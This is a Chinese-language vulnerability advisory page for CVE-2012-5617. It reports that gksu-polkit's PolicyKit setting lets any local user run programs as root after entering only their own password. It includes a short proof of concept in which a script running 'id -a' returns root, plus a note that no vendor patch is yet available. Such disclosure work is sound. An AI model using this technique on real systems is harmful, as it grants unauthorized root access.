gksu-polkit policykit配置文件身份验证设置权限提升漏洞

发布日期：2012-12-12
更新日期：2012-12-14受影响系统：
GNOME gksu-polkit
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56918
CVE（CAN） ID: CVE-2012-5617gksu-polkit是一个库和命令行工具，可以以root权限运行程序。gksu-polkit所带的PolicyKit配置文件允许用户以管理员权限执行程序，因为默认的allow_active设置是"auth_self"，而不是"auth_admin"，任何本地用户可利用此漏洞以root权限执行任意程序。<*来源：Miroslav Trmac

链接：https://launchpad.net/Ubuntu/+source/gksu-polkit
https://bugzilla.RedHat.com/show_bug.cgi？id=883162
https://bugzilla.redhat.com/show_bug.cgi？id=886671
http://bugs.debian.org/cgi-bin/bugreport.cgi？bug=695807
http://seclists.org/oss-sec/2012/q4/443
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！$ cat foo.sh
#！ /bin/bash
id -a
# not just gksu-polkit id -a because gksu-polkit tries to interpret the -a
# this prompts for user"s password only
$ gksu-polkit /home/user/foo.sh
uid=0（root） gid=0（root） groups=0（root） context=system_u:system_r:initrc_t:s0建议：
--------------------------------------------------------------------------------
厂商补丁：GNOME
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：https://live.gnome.org/gksuAdobe Flash Player和AIR远程整数溢出漏洞（CVE-2012-5677）IBM Server Firmware Power 5 Service Processor远程权限提升漏洞相关资讯权限提升漏洞

Windows （KDC）权限提升漏洞（CVE- （11/19/2014 17:46:20）
pfSense多个漏洞（12/26/2012 08:23:26）
Open Handset Alliance Android （08/01/2012 06:57:03）

Nvidia显示驱动服务权限提升漏洞（01/02/2013 08:37:58）
Computer Associates IdentityMind （12/24/2012 19:14:16）
Open Handset Alliance Android 权（08/01/2012 06:56:41）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容